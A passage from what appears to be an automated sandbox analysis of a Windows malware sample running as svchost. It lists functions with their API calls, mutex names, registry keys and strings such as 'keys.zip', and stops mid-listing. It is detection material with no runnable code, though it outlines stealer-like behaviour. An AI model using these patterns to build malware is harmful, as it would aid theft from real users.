                                                                                                                                                                                                                Function 02BD50F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                                  • Part of subcall function 02BC41E0: GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,756934D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                                  • Part of subcall function 02BC41E0: HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                                  • Part of subcall function 02BC41E0: memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                                • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02BD5100
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                                • API String ID: 734199406-1705633369
                                                                                                                                                                                                                • Opcode ID: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                                • Instruction ID: 0e9cf4be968420a69ab9577f85f06457942fe9f2421a44671ff3d99cab780442
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73214BB2D00209A7D73196649C44FFFB7BDDFC4751F600599FA45A7140FBB0AA858BA0
                                                                                                                                                                                                                Function 02BD5390 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,7556F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 02BD53BE
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BD53D2
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02BC56AF), ref: 02BD53E3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02BD53F3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5430
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5433
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5440
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5443
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1866686876-3277137149
                                                                                                                                                                                                                • Opcode ID: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                                • Instruction ID: d306593d33da86453497e9890489daf807d48075d96c7a9859f061b54284835c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E811B631A812017BD7709B759C08FDB7BADEF84795F848954FA05D3140EB75E610CBA1
                                                                                                                                                                                                                Function 02BD32C8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3316
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3330
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 4280258085-3409812998
                                                                                                                                                                                                                • Opcode ID: 7d468bef91f0ba070a8d326594825a5a9d8fb540412a75d329799a8b2b7100a0
                                                                                                                                                                                                                • Instruction ID: e5f3505e36bb8d586936ede718d56222800243479ef625d727bec6d74768bb2b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d468bef91f0ba070a8d326594825a5a9d8fb540412a75d329799a8b2b7100a0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FF0A730A857406BF2716B649C0AFCE77D8AF44B55F408594FB5AA2181DBF091158FA3
                                                                                                                                                                                                                Function 02BC01A0 Relevance: 16.6, APIs: 11, Instructions: 115memorynetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC01F4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BC020C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC020F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC021C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC021F
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000022,00000000,-02BFFAE4), ref: 02BC023C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC0259
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC0260
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC0270
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC02B5
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02BC02C9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3911349929-0
                                                                                                                                                                                                                • Opcode ID: ea13bc43d418810d208c7041b71f86a2f7dcb1b5b112fea86db6e8778ce682ae
                                                                                                                                                                                                                • Instruction ID: feb3dd982e59b500c3bf38f771ceabc178be96fd4ff11dae9ef7b2fc5fd39a39
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea13bc43d418810d208c7041b71f86a2f7dcb1b5b112fea86db6e8778ce682ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F417472A40304EFD760DFA8DC84F6BB7B8EB44710F10895CEA859B680DB70E954CBA0
                                                                                                                                                                                                                Function 02BC0050 Relevance: 16.6, APIs: 11, Instructions: 96memorynetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC0071
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 02BC008C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC008F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC009C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC009F
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02BC00BC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC00D9
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC00E0
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC00F0
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC0109
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,00000000,00000002), ref: 02BC011C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3911349929-0
                                                                                                                                                                                                                • Opcode ID: 5743bb387d8615b11038e991de635afa20a39f54365ddf834c27831924261390
                                                                                                                                                                                                                • Instruction ID: 706c5575e99de2f8b4e85f26da49726b52a7f303223725eea82b62693c771cb0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5743bb387d8615b11038e991de635afa20a39f54365ddf834c27831924261390
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B331C072A40214ABE760DA68DC88F57B7ACEF48760F148584FA489B281DB30A9158BF0
                                                                                                                                                                                                                Function 02BBF3C0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF404
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BBF40B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBF41B
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02BBF426
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02BF56DC,?,02BF5E1C,-057FF5C8,00000000,00000000,?), ref: 02BBF4EE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BBF4F5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000), ref: 02BBF501
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BBF508
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02BF5E1C,-057FF5C8,00000000,00000000,?), ref: 02BBF52E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF55A
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BBF55D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BBF56A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BBF56D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1948005343-0
                                                                                                                                                                                                                • Opcode ID: 54a1fd0513c7341940e0fdc9a5d0da8a2b75890889e8b8aa70a8a384ab5bb858
                                                                                                                                                                                                                • Instruction ID: 1a9e171d959fa5666bec33d9fe6f052f56b3537a4e1abecb4210c1e180beb4cc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54a1fd0513c7341940e0fdc9a5d0da8a2b75890889e8b8aa70a8a384ab5bb858
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4561A276A00209ABDB21CF68DC84AFEB7A9FF84364F048295FE0597741D7B0D951CBA0
                                                                                                                                                                                                                Function 02BB7B00 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7B33
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7B4B
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7556F380), ref: 02BB7B6C
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7556F380), ref: 02BB7B92
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7556F380), ref: 02BB7C1D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7556F380), ref: 02BB7C24
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7C33
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,7556F380), ref: 02BB7C63
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4158279268-3673152959
                                                                                                                                                                                                                • Opcode ID: 6e22941ec68c055b5a0fda0f188c028ffb7ac1cf82aaa998a5e4a62ab63356d5
                                                                                                                                                                                                                • Instruction ID: 3c204aad1bfef03f5f911570e24a4f463aeaa38fbf9d434ae79501820aca1d1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e22941ec68c055b5a0fda0f188c028ffb7ac1cf82aaa998a5e4a62ab63356d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541D672900159AFEB25DB748899AFEB7BDEF88304F4045ECE655D3140D7B05A498BA0
                                                                                                                                                                                                                Function 02BD4278 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 121synchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C,?,?), ref: 02BD4329
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02BD43B5
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 02BD43D2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD43D9
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 2697826820-149072808
                                                                                                                                                                                                                • Opcode ID: c003d2b60ba51930d3c76044eae71a68be9743cd747881805ff575bce5119761
                                                                                                                                                                                                                • Instruction ID: b536adbb3e2b29c4a9e3c37d333552d1454cbbda98eefc32dd8ab101ba52959a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c003d2b60ba51930d3c76044eae71a68be9743cd747881805ff575bce5119761
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41233194474A4FCB2ACB3C98657EA7BF5EF4A340F1585E4D9CAD7240EB719948C780
                                                                                                                                                                                                                Function 02BC48F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103registrystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC4902
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC491A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4941
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 02BC496F
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-0ABB61A1,software\microsoft,00000000,00000102,00000000), ref: 02BC49CE
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 02BC49FE
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000), ref: 02BC4A0C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02BC4A1A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 1783443066-3673152959
                                                                                                                                                                                                                • Opcode ID: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                                • Instruction ID: 125ec3e8b7df970167459bf06ff61ae1f6c4ed932a4c7ec44b39123f9f7e0629
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC314431A0021DAFDB26CB24DC19BEA7BB8EB05305F1001D8EB55AB140D7B09B48CBA0
                                                                                                                                                                                                                Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 2248944234-2746444292
                                                                                                                                                                                                                • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                                • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                                Function 02BD2800 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD2827
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02BD2867
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 02BD2871
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2879
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD288A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?), ref: 02BD2891
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02BD289E
